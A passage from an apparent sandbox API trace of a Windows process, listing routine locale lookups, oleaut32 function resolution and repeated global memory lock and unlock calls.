cchData=256 | out: lpLCData="Mar") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sep") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thu") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0060.202] GetThreadLocale () returned 0x409 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0060.202] GetThreadLocale () returned 0x409 [0060.202] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0060.203] GetThreadLocale () returned 0x409 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0060.203] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0060.203] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=18055807900) returned 1 [0060.204] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0060.204] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0060.205] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0060.206] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0060.207] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.207] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.208] GlobalUnlock (hMem=0x450004) returned 0 [0060.208] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.208] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.208] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.208] GlobalUnlock (hMem=0x450004) returned 0 [0060.208] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.208] GlobalUnlock (hMem=0x45000c) returned 0 [0060.209] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.209] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.209] GlobalUnlock (hMem=0x45000c) returned 0 [0060.209] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.209] GlobalLock (hMem=0x450004) returned 0x570678 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.210] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.210] GlobalUnlock (hMem=0x450004) returned 0 [0060.210] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.210] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.210] GlobalUnlock (hMem=0x45000c) returned 0 [0060.210] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.211] GlobalLock (hMem=0x450004) returned 0x570678 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.211] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.211] GlobalUnlock (hMem=0x450004) returned 0 [0060.211] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.211] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.211] GlobalUnlock (hMem=0x45000c) returned 0 [0060.211] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.212] GlobalLock (hMem=0x450004) returned 0x570678 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.212] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.212] GlobalUnlock (hMem=0x450004) returned 0 [0060.212] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.212] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.212] GlobalUnlock (hMem=0x45000c) returned 0 [0060.212] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.213] GlobalLock (hMem=0x450004) returned 0x570678 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.213] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.213] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.213] GlobalUnlock (hMem=0x450004) returned 0 [0060.213] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.213] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.213] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.213] GlobalUnlock (hMem=0x45000c) returned 0 [0060.214] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.214] GlobalLock (hMem=0x450004) returned 0x570678 [0060.214] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalReAlloc (hMem=0x450004, dwBytes=0x10, uFlags=0x2) returned 0x450004 [0060.214] GlobalLock (hMem=0x450004) returned 0x570678 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.214] GlobalUnlock (hMem=0x45000c) returned 0 [0060.214] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.214] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.214] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.214] GlobalUnlock (hMem=0x450004) returned 0 [0060.214] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.215] GlobalLock (hMem=0x450004) returned 0x570678 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.215] GlobalUnlock (hMem=0x45000c) returned 0 [0060.215] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.215] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.215] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.215] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.215] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.215] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.216] GlobalLock (hMem=0x450004) returned 0x570678 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.216] GlobalUnlock (hMem=0x45000c) returned 0 [0060.216] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.216] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.216] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.216] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.216] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.217] GlobalLock (hMem=0x450004) returned 0x570678 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.217] GlobalUnlock (hMem=0x45000c) returned 0 [0060.217] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.217] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.217] GlobalUnlock (hMem=0x450004) returned 0 [0060.217] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.217] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.217] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.218] GlobalUnlock (hMem=0x450004) returned 0 [0060.218] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.218] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.218] GlobalLock (hMem=0x450004) returned 0x570678 [0060.218] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.218] GlobalUnlock (hMem=0x45000c) returned 0 [0060.218] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.218] GlobalUnlock (hMem=0x450004) returned 0 [0060.218] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.218] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.219] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.219] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.219] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.219] GlobalLock (hMem=0x450004) returned 0x570678 [0060.219] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.219] GlobalUnlock (hMem=0x45000c) returned 0 [0060.219] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.219] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.220] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.220] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.220] GlobalLock (hMem=0x450004) returned 0x570678 [0060.220] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.220] GlobalUnlock (hMem=0x45000c) returned 0 [0060.220] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.220] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.221] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.221] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.221] GlobalUnlock (hMem=0x450004) returned 0 [0060.221] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.221] GlobalUnlock (hMem=0x45000c) returned 0 [0060.221] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.221] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.221] GlobalUnlock (hMem=0x45000c) returned 0 [0060.221] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.221] GlobalLock (hMem=0x450004) returned 0x570678 [0060.223] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.223] GlobalUnlock (hMem=0x45000c) returned 0 [0060.223] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.223] GlobalUnlock (hMem=0x450004) returned 0 [0060.223] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.223] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.224] GlobalUnlock (hMem=0x450004) returned 0 [0060.224] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.224] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.224] GlobalUnlock (hMem=0x450004) returned 0 [0060.224] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.224] GlobalLock (hMem=0x450004) returned 0x570678 [0060.224] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.224] GlobalUnlock (hMem=0x45000c) returned 0 [0060.224] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.225] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.225] GlobalUnlock (hMem=0x450004) returned 0 [0060.225] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.225] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.225] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.225] GlobalLock (hMem=0x450004) returned 0x570678 [0060.225] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.225] GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.226] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.226] GlobalUnlock (hMem=0x450004) returned 0 [0060.226] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.226] GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.226] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.226] GlobalUnlock (hMem=0x45000c) returned 0 [0060.226] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.227] GlobalLock (hMem=0x450004) returned 0x570678 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.227] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.227] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.227] GlobalUnlock (hMem=0x450004) returned 0 [0060.227] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.227] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.227] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.227] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.228] GlobalLock (hMem=0x450004) returned 0x570678 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.228] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.228] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.228] GlobalUnlock (hMem=0x450004) returned 0 [0060.228] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.228] GlobalUnlock (hMem=0x45000c) returned 0 [0060.228] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.228] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.228] GlobalUnlock (hMem=0x45000c) returned 0 [0060.229] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.229] GlobalLock (hMem=0x450004) returned 0x570678 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.229] GlobalUnlock (hMem=0x45000c) returned 0 [0060.229] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.229] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.229] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.229] GlobalUnlock (hMem=0x450004) returned 0 [0060.229] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.230] GlobalLock (hMem=0x450004) returned 0x570678 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x45000c 